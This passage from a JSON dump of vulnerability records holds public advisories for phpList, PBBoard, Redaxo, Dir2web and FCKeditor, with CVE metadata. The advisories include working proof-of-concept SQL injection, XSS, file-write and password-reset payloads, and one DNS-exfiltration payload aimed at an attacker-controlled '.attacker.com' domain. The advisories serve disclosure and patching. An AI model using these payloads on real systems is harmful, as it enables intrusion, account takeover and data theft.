\".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \nhttp://[host]/admin/?page=editattributes&id=1&delete=1 union select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))) -- \n \nSecond alternative is to exploit this SQL injection vulnerability also via XSRF vector, but to perform XSS attack against logged-in administrator. The following PoC code will simply display administrator cookies: \nhttp://[host]/admin/?page=editattributes&id=1&delete=1 union select char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,1 01,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62) -- \n\n", "edition": 2, "cvss3": {}, "published": "2012-07-11T00:00:00", "type": "htbridge", "title": "Multiple Vulnerabilities in phpList", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3952", "CVE-2012-3953"], "modified": "2012-08-06T00:00:00", "id": "HTB23100", "href": "https://www.htbridge.com/advisory/HTB23100", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P/"}}, {"lastseen": "2020-12-24T11:33:53", "description": "High-Tech Bridge Security Research Lab has discovered vulnerability in Redaxo, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n1) Cross-Site Scripting (XSS) in Redaxo: CVE-2012-3869 \n1.1 Input passed via the \"subpage\" GET parameter to /redaxo/index.php (when \"page\" is set to \"user\" or \"template\") is not properly sanitised before being returned to the user. \nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website. \nThe following PoC (Proof of Concept) demonstrate the vulnerability: \nhttp://[host]/redaxo/index.php?page=user&subpage=%22%3E%3Cscript%3Ealert%28d ocument.cookie%29;%3C/script%3E \nhttp://[host]/redaxo/index.php?page=templat e&subpage=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\n", "edition": 2, "published": "2012-07-04T00:00:00", "type": "htbridge", "title": "Cross-Site Scripting (XSS) in Redaxo", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3869"], "modified": "2012-07-23T00:00:00", "id": "HTB23098", "href": "https://www.htbridge.com/advisory/HTB23098", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:45", "description": "\r\n\r\nAdvisory ID: HTB23101\r\nProduct: PBBoard\r\nVendor: www.pbboard.com\r\nVulnerable Version(s): 2.1.4 and probably prior\r\nTested Version: 2.1.4\r\nVendor Notification: July 18, 2012 \r\nPublic Disclosure: August 8, 2012 \r\nVulnerability Type: SQL Injection [CWE-89], Improper Authentication [CWE-287], Improper Access Control [CWE-284]\r\nCVE References: CVE-2012-4034, CVE-2012-4035, CVE-2012-4036\r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in PBBoard, which can be exploited to perform SQL injection attacks, change password of arbitrary user and create arbitrary files in folder of the vulnerable application.\r\n\r\n\r\n1) Multiple SQL Injections in PBBoard: CVE-2012-4034\r\n\r\n1.1 Input passed via the "username" POST parameter to /index.php (when "id", "member" and "start" parameters are set, and "page" is set to "send") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC (Proof of Concept) demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/index.php?id=1&member=1&page=send&start=1" method="post" name="main" id="main">\r\n<input type="hidden" name="username" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">\r\n<input type="submit" name="Submit" value="Send"> \r\n</form>\r\n\r\n\r\n 1.2 Input passed via the "email" POST parameter to /index.php (when "send_active_code" parameter is set, and "page" is set to "forget") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/index.php?page=forget&send_active_code=1" method="post" name="main" id="main">\r\n<input type="hidden" name="email" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">\r\n<input type="submit" name="Submit" value="Send"> \r\n</form>\r\n\r\n\r\n1.3 Input passed via the "password" POST parameter to /index.php (when "password_check" and "id" parameters are set, and "page" is set to "forum_archive") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/index.php?page=forum_archive&password_check=1&id=1" method="post" name="main" id="main">\r\n<input type="hidden" name="password" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">\r\n<input type="submit" name="Submit" value="Send"> \r\n</form>\r\n\r\n\r\n1.4 Input passed via the "section" POST parameter to /index.php (when "move" and "subject_id" parameters are set, and "page" is set to "management") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/index.php?page=management&move=1&subject_id=1" method="post" name="main" id="main">\r\n<input type="hidden" name="section" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">\r\n<input type="submit" name="Submit" value="Send"> \r\n</form>\r\n\r\n\r\n1.5 Input passed via the "section_id" POST parameter to /index.php (when "startdeleteposts" and "do_replys" parameters are set, and "page" is set to "managementreply") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/index.php?page=managementreply&startdeleteposts=1&do_replys=1" method="post" name="main" id="main">\r\n<input type="hidden" name="section_id" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">\r\n<input type="hidden" name="check[]" value="1">\r\n<input type="submit" name="Submit" value="Send"> \r\n</form>\r\n\r\n\r\n1.6 Input passed via the "member_id" POST parameter to /index.php (when "forget" parameter is set, and "page" is set to "new_password") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/index.php?page=new_password&forget=1" method="post" name="main" id="main">\r\n<input type="hidden" name="member_id" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">\r\n<input type="hidden" name="new_password" value="1">\r\n<input type="submit" name="Submit" value="Send"> \r\n</form>\r\n\r\n\r\n1.7 Input passed via the "subjectid" POST parameter to /index.php (when "start" parameter is set, and "page" is set to "tags") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/index.php?page=tags&start=1" method="post" name="main" id="main">\r\n<input type="hidden" name="subjectid" value="' union select '<? php_code ?>',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 INTO OUTFILE '../../../path/to/site/file.php' -- ">\r\n<input type="submit" name="Submit" value="Send"> \r\n</form>\r\n\r\n\r\nSuccessful exploitation of the above-mentioned vulnerabilities (1.1 - 1.7) requires that "magic_quotes_gpc" is set to "off". SQL injection in POST request can be also exploited with a FireFox browser equipped with Tamper Data plugin. \r\n\r\n\r\n2) Improper Authentication in PBBoard: CVE-2012-4035\r\n\r\nPBBoard permits to change password of any board member due to absence of any verification of user-supplied "member_id" POST parameter in the password change script.\r\n\r\nThe following PoC changes password for the user with ID=1 (forum administrator):\r\n\r\n\r\n<form action="http://[host]/index.php?page=new_password&forget=1" method="post" name="main" id="main">\r\n<input type="hidden" name="member_id" value="1">\r\n<input type="hidden" name="new_password" value="new_password">\r\n<input type="submit" name="Submit" value="Send"> \r\n</form>\r\n\r\n\r\n\r\n3) Improper Access Control in PBBoard: CVE-2012-4036\r\n\r\nInput passed via the "xml_name" POST parameter to /admin.php (when "export" and "export_writing" parameters are set, and "page" parameter is set to "addons") is not properly sanitised before being used as a name of a newly created file.\r\n\r\nAn attacker can create an arbitrary .php file and potentially execute arbitrary PHP code on vulnerable system depending on server configuration.\r\n\r\nThe following PoC will create a file located at: http://[host]/addons/file.php that will display result of phpinfo() function execution:\r\n\r\n\r\n<form action="http://[host]/admin.php?page=addons&export=1&export_writing=1&xml_name=file.php" method="post" name="main" id="main">\r\n<input type="hidden" name="context" value='<? phpinfo(); ?>'>\r\n<input type="submit" name="Submit" value="Send"> \r\n</form>\r\n\r\n\r\nSuccessful exploitation of this vulnerability requires administrative priveledges, however can be also exploited via CSRF vector (CVE-2012-1216). The CSRF vulnerability has not been patched by the Vendor Notification date. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nApply 5-8-2012 Security Patch\r\n\r\nMore Information:\r\nhttp://www.pbboard.com/forums/t10352.html\r\nhttp://www.pbboard.com/forums/t10353.html\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23101 - https://www.htbridge.com/advisory/HTB23101 - Multiple vulnerabilities in PBBoard.\r\n[2] PBBoard - http://www.pbboard.com - PBBoard is a free flat-forum bulletin board software.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n", "edition": 1, "cvss3": {}, "published": "2012-08-13T00:00:00", "title": "Multiple vulnerabilities in PBBoard", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-4036", "CVE-2012-4034", "CVE-2012-4035", "CVE-2012-1216"], "modified": "2012-08-13T00:00:00", "id": "SECURITYVULNS:DOC:28369", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28369", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:45", "description": "\r\n\r\nAdvisory ID: HTB23100\r\nProduct: phpList\r\nVendor: phpList Ltd\r\nVulnerable Version(s): 2.10.18 and probably prior\r\nTested Version: 2.10.18\r\nVendor Notification: July 11, 2012 \r\nPublic Disclosure: August 8, 2012 \r\nVulnerability Type: Cross-Site Scripting [CWE-79], SQL Injection [CWE-89]\r\nCVE References: CVE-2012-3952, CVE-2012-3953\r\nCVSSv2 Base Scores: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: Medium \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab has discovered multiple vulnerabilities in phpList, which can be exploited to perform Cross-Site Scripting (XSS) and SQL Injection attacks against the vulnerable application.\r\n\r\n\r\n1) Cross-Site Scripting (XSS) in phpList: CVE-2012-3952\r\n\r\nInput passed via the "unconfirmed" GET parameter to /admin/index.php (when "page" is set to "user") is not properly sanitised before being returned to the user.\r\n\r\nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.\r\n\r\nThe following PoC (Proof of Concept) demonstrates the vulnerability:\r\n\r\n\r\nhttp://[host]/admin/?page=user&find=1&unconfirmed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\n\r\n\r\n\r\n2) SQL Injection in phpList: CVE-2012-3953\r\n\r\nInput passed via the "delete" GET parameter to /admin/index.php (when "page" is set to "editattributes") is not properly sanitised before being used in SQL query.\r\n\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. However successful exploitation of this vulnerability requires administrator's privileges. \r\n\r\n\r\nThe following PoC demonstrates vulnerability exploitation under administrator's account:\r\n\r\n\r\nhttp://[host]/admin/?page=editattributes&id=1&delete=1 union select version() --\r\n\r\n\r\n\r\nAlternative exploitation of the SQL injection can be performed via XSRF vector and does not require administrative privileges. The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n\r\nhttp://[host]/admin/?page=editattributes&id=1&delete=1 union select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))) -- \r\n\r\n\r\n\r\nSecond alternative is to exploit this SQL injection vulnerability also via XSRF vector, but to perform XSS attack against logged-in administrator. The following PoC code will simply display administrator cookies:\r\n\r\n\r\nhttp://[host]/admin/?page=editattributes&id=1&delete=1 union select char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62) -- \r\n\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to phpList 2.10.19\r\n\r\nMore Information:\r\nhttp://www.phplist.com/?lid=579\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23100 - https://www.htbridge.com/advisory/HTB23100 - Cross-Site Scripting (XSS) in phpList.\r\n[2] phpList - http://www.phplist.com - phpList is the world's most popular open source email campaign manager.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n", "edition": 1, "cvss3": {}, "published": "2012-08-13T00:00:00", "title": "Multiple Vulnerabilities in phpList", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-3952", "CVE-2012-3953"], "modified": "2012-08-13T00:00:00", "id": "SECURITYVULNS:DOC:28366", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28366", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:45", "description": "\r\n\r\nTitle:\r\n======\r\nDir2web3 Multiple Vulnerabilities\r\n\r\nDate:\r\n=====\r\n05/08/2012\r\n\r\nAuthor:\r\n=======\r\nDaniel Correa (http://www.sinfocol.org/)\r\n\r\nVulnerable software:\r\n====================\r\nDir2web v3.0 (http://www.dir2web.it/)\r\n\r\nCVE:\r\n====\r\nCVE-2012-4069\r\nCVE-2012-4070\r\n\r\nDetails:\r\n========\r\nThere are two vulnerabilities identified on Dir2web v3.0:\r\n\r\nInformation disclosure (CVE-2012-4069):\r\nDatabase folder is public and it is not protected via .htaccess. An attacker\r\ncan download the entire database and look for hidden pages on the website.\r\n\r\nSQL Injection (CVE-2012-4070):\r\nPreg_match function is not enough to protect GET/POST parameters. An\r\nattacker\r\ncan easily make a SQL Injection over the application.\r\n\r\nExploit:\r\n========\r\nInformation disclosure:\r\nhttp://site/_dir2web/system/db/website.db\r\n\r\nSQL Injection:\r\nhttp://site/index.php?wpid=homepage&oid=6a303a0aaa' OR id > 0-- -\r\n\r\nPatch:\r\n======\r\nInformation disclosure:\r\nCreate .htaccess file on _dir2web folder with the following content:\r\norder deny, follow\r\ndeny from all\r\n\r\nSQL Injection:\r\nFix the regular expression in dispatcher.php file located on\r\n_dir2web/system/src folder.\r\n\r\nReplace:\r\n'/[a-zA-Z0-9]{10}/'\r\nWith:\r\n'/^[a-zA-Z0-9]{10}$/'\r\n\r\nTimeline:\r\n=========\r\n13/07/2012: Vendor contacted\r\n25/07/2012: CERT contacted\r\n27/07/2012: CVE assigned\r\n05/08/2012: Vulnerability published on Bugtraq\r\n\r\n-- Regards, Daniel Correa\r\n", "edition": 1, "cvss3": {}, "published": "2012-08-13T00:00:00", "title": "Dir2web3 Mutiple Vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-4069", "CVE-2012-4070"], "modified": "2012-08-13T00:00:00", "id": "SECURITYVULNS:DOC:28374", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28374", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:45", "bulletinFamily": "software", "cvelist": ["CVE-2012-3869"], "description": "\r\n\r\nAdvisory ID: HTB23098\r\nProduct: Redaxo\r\nVendor: Redaxo team\r\nVulnerable Version(s): 4.4 and probably prior\r\nTested Version: 4.4\r\nVendor Notification: 4 July 2012 \r\nVendor Patch: 23 July 2012 \r\nPublic Disclosure: 25 July 2012 \r\nVulnerability Type: Cross-Site Scripting (XSS)\r\nCVE Reference: CVE-2012-3869\r\nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: Medium \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab has discovered vulnerability in Redaxo, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Cross-Site Scripting (XSS) in Redaxo: CVE-2012-3869\r\n\r\n1.1 Input passed via the "subpage" GET parameter to /redaxo/index.php (when "page" is set to "user" or "template") is not properly sanitised before being returned to the user.\r\n\r\nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.\r\n\r\nThe following PoC (Proof of Concept) demonstrate the vulnerability:\r\n\r\n\r\nhttp://[host]/redaxo/index.php?page=user&subpage=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\nhttp://[host]/redaxo/index.php?page=template&subpage=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nApply vendor's patch: http://www.redaxo.org/files/sicherheitsupdate_4_3_und_4_4.zip\r\nMore Information:\r\nhttp://www.redaxo.org/de/download/sicherheitshinweise/\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23098 - https://www.htbridge.com/advisory/HTB23098 - Cross-Site Scripting (XSS) in Redaxo.\r\n[2] Redaxo - http://www.redaxo.org/ - PHP MySQL Open Source Content Management System.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n", "edition": 1, "modified": "2012-08-13T00:00:00", "published": "2012-08-13T00:00:00", "id": "SECURITYVULNS:DOC:28378", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28378", "title": "Cross-Site Scripting (XSS) in Redaxo", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:45", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2522-1 security@debian.org\r\nhttp://www.debian.org/security/ Yves-Alexis Perez\r\nAugust 05, 2012 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : fckeditor\r\nVulnerability : cross site scripting\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2012-4000\r\nDebian Bug : 683418\r\n\r\nEmilio Pinna discovered a cross site scripting vulnerability in the\r\nspellchecker.php page of FCKeditor, a popular html/text editor for the web.\r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 1:2.6.6-1squeeze1.\r\n\r\nFor the testing distribution (wheezy), this problem has been fixed in\r\nversion 1:2.6.6-3.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 1:2.6.6-3.\r\n\r\nWe recommend that you upgrade your fckeditor packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niQIcBAEBCgAGBQJQH37dAAoJEDBVD3hx7wuovjQP/0aoCME4eFFseyirINsdsaqV\r\nBinmmhsl5sY2G48EiMyEq3RH0eSg2Pip3MA6JJCErdhYvAA4FGEIM3jiSymEIyxE\r\navnKrbVxR1xH8cFJXVyMdu7za6dBFydW6ZUAT7P5+hPVoaGwQ3R4EwSVBlNV5PHr\r\nCQCr6pG/mICUiYyAWC23VeL6PHO7hIS5Evi33DW6wOQg/NB8ERsACt8NIirFSAAB\r\ngbPg6ny7x+mioxxGrUzh7XZe7aRYjjk0CFdmgmcpMjEB7h++6qwGlbWLhPt3ddeC\r\nIwmui85FHIgINTqRIuPszpub5IBkn7A3qUiMl6yzd/Igdjlb5oJt40C6mQ2nrXMj\r\nDBo5AGxq/Xv3QXyFrpuIXcS7G1hlpef7c0ofFAkNCKKMQllYhqdLUp6kTB+6yWCx\r\naPjtRnnvn3co6zkNpmWnCh2DQ65taY3CDxdymfEOTeAZEvFv5R9Ge+Q0jQO+6xLV\r\nteGnZIHf1znOFj3nfUKTOyI+s6FWXFsaYaYnsXuQnZzBlc8opM2IILYd/MQqIiH+\r\nzMaosJraYlP8Om8XGd2NUFmigYzi6x3klwWsbRHaowgC9OxL1AlAZDs9maLu+Q2C\r\naSqhUd3xd5dikc1Eu23kdetKotjpyj4LzMP3gAdcIUtqd/N1vrMT8Cj3tSdueJwO\r\n1kY5sLaI9j1nsx8QPftT\r\n=rOo8\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "cvss3": {}, "published": "2012-08-13T00:00:00", "title": "[SECURITY] [DSA 2522-1] fckeditor security update", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-4000"], "modified": "2012-08-13T00:00:00", "id": "SECURITYVULNS:DOC:28368", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28368", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:52", "description": "\r\n\r\nClass\t\tCross-Site Scripting\r\nRemote\tYes\r\nPublished\t2nd June 2014\r\nCredit\t\tRobin Bailey of Dionach (vulns@dionach.com)\r\nVulnerable\tFCKeditor <= 2.6.10\r\n\r\nFCKeditor is prone to a reflected cross-site scripting (XSS) vulnerability due to inadequately sanitised user input. An attacker may leverage this issue to run JavaScript in the context of a victim's browser.\r\n\r\nFCKeditor 2.6.10 is known to be vulnerable; older versions may also be vulnerable. \r\n\r\nNote that this issue is related to CVE-2012-4000, which was a cross-site scripting vulnerability in the values of the textinputs[] array passed to the spellchecker.php page. To resolve this issue the values of this array were encoded with htmlspecialchars() before being output to the page; however the array keys were still echoed unencoded.\r\n\r\nPoC:\r\n\r\nPOST http://[target]/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php\r\ntextinputs[1</script><script>alert(document.cookie);//</script>]=zz\r\n\r\nThe vendor was notified of this issue, and FCKeditor 2.6.11 was released to address this vulnerability. See the following vendor announcement:\r\n\r\nhttp://ckeditor.com/blog/FCKeditor-2.6.11-Released\r\n\r\nTimeline:\r\n\r\n28/05/2014\tVulnerability identified\r\n28/05/2014\tInitial vendor contact\r\n28/05/2014\tVendor response to contact\r\n28/05/2014\tVulnerability disclosed to vendor\r\n29/05/2014\tVendor confirms vulnerability\r\n02/06/2014\tVendor releases patch\r\n02/06/2014\tPublic disclosure of vulnerability\r\n\r\n______________________________________________________________________\r\n\r\nDisclaimer: This e-mail and any attachments are confidential.\r\n\r\nIt may contain privileged information and is intended for the named\r\naddressee(s) only. It must not be distributed without Dionach Ltd consent.\r\nIf you are not the intended recipient, please notify the sender immediately and destroy this e-mail. \r\n\r\nAny unauthorised copying, disclosure or distribution of the material in this e-mail is strictly forbidden. Unless expressly stated, opinions in this e-mail are those of the individual sender, and not of Dionach Ltd.\r\n\r\nDionach Ltd, Greenford House, London Road, Wheatley, Oxford OX33 1JH Company Registration No. 03908168, VAT No. GB750661242\r\n\r\n______________________________________________________________________\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-06-14T00:00:00", "title": "FCKedtior 2.6.10 Reflected Cross-Site Scripting (XSS)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-4000"], "modified": "2014-06-14T00:00:00", "id": "SECURITYVULNS:DOC:30848", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30848", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "cve": [{"lastseen": "2022-03-23T12:47:58", "description": "The new_password page in PBBoard 2.1.4 allows remote attackers to change the password of arbitrary user accounts via the member_id and new_password parameters to index.php.", "cvss3": {}, "published": "2012-08-12T00:55:00", "type": "cve", "title": "CVE-2012-4035", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4035"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:pbboard:pbboard:2.1.4"], "id": "CVE-2012-4035", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4035", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pbboard:pbboard:2.1.4:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:20", "description": "SQL injection vulnerability in admin/index.php in phpList before 2.10.19 allows remote administrators to execute arbitrary SQL commands via the delete parameter to the editattributes page.", "cvss3": {}, "published": "2012-08-12T00:55:00", "type": "cve", "title": "CVE-2012-3953", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 